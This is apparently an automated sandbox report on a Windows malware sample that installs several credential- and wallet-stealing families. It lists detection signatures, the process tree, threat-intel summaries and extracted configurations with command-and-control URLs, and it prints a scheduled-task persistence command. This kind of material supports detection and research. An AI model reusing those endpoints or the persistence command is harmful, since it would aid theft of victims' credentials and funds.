Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1503584
MD5:	884cdb86a958ae71754d1ba5c04a4f11
SHA1:	3a52a15bdcd7d291b2ceb4d173a774ebc587963e
SHA256:	ff02bcdde4dacb915cc3aefde1936bf0a17e08954982d90157c78cce10c5e225
Tags:	exe
Infos:

Detection

LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected CryptOne packer

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Drops large PE files

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 3396 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 884CDB86A958AE71754D1BA5C04A4F11)

axplong.exe (PID: 4936 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 884CDB86A958AE71754D1BA5C04A4F11)

axplong.exe (PID: 3212 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 884CDB86A958AE71754D1BA5C04A4F11)

crypted.exe (PID: 4216 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe" MD5: 6134586375C01F97F8777BAE1BF5ED98)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

crypteda.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe" MD5: 8E74497AFF3B9D2DDB7E7F819DFC69BA)

RegAsm.exe (PID: 3872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

CZjRdKVnFB.exe (PID: 4536 cmdline: "C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe" MD5: 88367533C12315805C059E688E7CDFE9)

conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rHCHrI9F0v.exe (PID: 1012 cmdline: "C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe" MD5: 30F46F4476CDC27691C7FDAD1C255037)

Nework.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

Hkbsse.exe (PID: 5124 cmdline: "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

stealc_default2.exe (PID: 6012 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)

Set-up.exe (PID: 5416 cmdline: "C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe" MD5: 06B767BF2A7DEAC9B9E524C5B6986BF7)

1.exe (PID: 6712 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\1.exe" MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)

svchost015.exe (PID: 7068 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

Setup.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe" MD5: 7ADB5E2E04A5DCADA12236D363F6A4C4)

Amadeus.exe (PID: 5676 cmdline: "C:\Users\user\1000238002\Amadeus.exe" MD5: 36A627B26FAE167E6009B4950FF15805)

BitLockerToGo.exe (PID: 1136 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

build.exe (PID: 608 cmdline: "C:\Users\user\AppData\Local\Temp\1000241001\build.exe" MD5: 05C1BAAA01BD0AA0CCB5EC1C43A7D853)

conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

runtime.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" MD5: B73CF29C0EA647C353E4771F0697C41F)

AppLaunch.exe (PID: 5264 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

channel3.exe (PID: 5192 cmdline: "C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe" MD5: 1F68ADC3E8D52FEF37E7E2DE22D0CD86)

crypted.exe (PID: 396 cmdline: "C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe" MD5: 7E8C1E8B4C37553A6BC11083B18CEBDF)

conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4144 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 4928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 5616 cmdline: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6188 cmdline: schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Hkbsse.exe (PID: 4208 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

runtime.exe (PID: 5280 cmdline: "C:\Users\user\Pictures\Lighter Tech\runtime.exe" MD5: B73CF29C0EA647C353E4771F0697C41F)

Amadeus.exe (PID: 6736 cmdline: "C:\Users\user\1000238002\Amadeus.exe" MD5: 36A627B26FAE167E6009B4950FF15805)

BitLockerToGo.exe (PID: 4920 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

runtime.exe (PID: 704 cmdline: "C:\Users\user\Pictures\Lighter Tech\runtime.exe" MD5: B73CF29C0EA647C353E4771F0697C41F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://asec.ahnlab.com/en/59590/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}

Threatname: LummaC

{"C2 url": ["millyscroqwp.shop", "stagedchheiqwo.shop", "evoliutwoqm.shop", "locatedblsoqp.shop", "stamppreewntnq.shop", "traineiwnqo.shop", "condedqpwqm.shop", "caffegclasiqwp.shop"], "Build id": "y1TO5A--QX1"}

Threatname: Vidar

{"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default2"}

Threatname: Amadey

{"C2 url": "185.215.113.26/Dem7kTu/index.php", "Version": "4.41", "Install Folder": "054fdc5f70", "Install File": "Hkbsse.exe"}

Threatname: Cryptbot

{"C2 list": ["thirtv13vt.top", "analforeverlovyu.top"]}

Threatname: RedLine

{"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45693:$s1: file:/// 0x455ef:$s2: {11111-22222-10009-11112} 0x45623:$s3: {11111-22222-50001-00000} 0x4264e:$s4: get_Module 0x3cd3c:$s5: Reverse 0x3da37:$s6: BlockCopy 0x3cd0a:$s7: ReadByte 0x456a5:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\Nework[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58137:$s1: file:/// 0x5806f:$s2: {11111-22222-10009-11112} 0x580c7:$s3: {11111-22222-50001-00000} 0x54b4c:$s4: get_Module 0x4e8e2:$s5: Reverse 0x4f6bc:$s6: BlockCopy 0x4e7bb:$s7: ReadByte 0x58149:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000241001\build.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1000241001\build.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000241001\build.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58137:$s1: file:/// 0x5806f:$s2: {11111-22222-10009-11112} 0x580c7:$s3: {11111-22222-50001-00000} 0x54b4c:$s4: get_Module 0x4e8e2:$s5: Reverse 0x4f6bc:$s6: BlockCopy 0x4e7bb:$s7: ReadByte 0x58149:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 11 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2746566674.00000000001B1000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001E.00000002.2560282937.000000001CDE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000000.2028680920.0000000000471000.00000020.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.2038154443.0000000000621000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000002.2732580728.00000000014EC000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000007.00000003.1914720636.00000000048A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000000.2035548380.0000000000621000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2154611866.0000000002898000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000000.2003484391.0000000000A12000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000000.2004024984.00000000004A2000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000002.2264539028.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000000.2385848983.0000000000BE2000.00000002.00000001.01000000.0000001E.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000B.00000002.2106632894.0000000000421000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1500851216.0000000000801000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000002.2259797317.0000000003029000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000002.00000002.1529134155.00000000001B1000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1460552733.0000000005000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.2612049284.000000000196C000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000001F.00000002.2745835536.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.1959861483.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000019.00000002.2456504727.0000000000A5C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000E.00000002.2004782582.0000000000479000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000003.1484616344.00000000049D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000000.2041814507.0000000000621000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000015.00000002.2746002669.0000000000621000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000025.00000002.2578867327.0000000000591000.00000002.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000B.00000002.2110237826.00000000034AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.2518264534.00000000125A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.2703663881.00000000041C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000002.2264539028.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000002.2775940652.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002B.00000002.2745709445.0000000000420000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.2110237826.00000000033F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: crypted.exe PID: 4216	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3964	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3964	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3872	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: CZjRdKVnFB.exe PID: 4536	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: rHCHrI9F0v.exe PID: 1012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rHCHrI9F0v.exe PID: 1012	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6012	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6012	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 6012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 6012	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Set-up.exe PID: 5416	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: 1.exe PID: 6712	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 1.exe PID: 6712	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 7068	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: svchost015.exe PID: 7068	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 7068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost015.exe PID: 7068	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: Setup.exe PID: 7044	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: build.exe PID: 608	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: channel3.exe PID: 5192	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: crypted.exe PID: 396	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4928	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4928	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 66 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.Hkbsse.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
